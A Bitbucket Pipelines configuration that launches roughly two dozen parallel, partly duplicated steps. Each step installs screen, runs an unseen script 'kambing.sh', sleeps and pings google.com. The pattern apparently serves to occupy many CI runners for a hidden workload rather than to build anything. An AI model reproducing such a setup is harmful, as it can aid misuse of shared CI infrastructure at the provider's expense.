image: python:3.8
pipelines:
  default:
    - parallel:
      - step:
          name: build-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com
      - step:
          name: build-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-5
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555 
            - ping google.com
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - chmod +x kambing.sh  &&  ./kambing.sh
            - sleep 555
            - ping google.com            
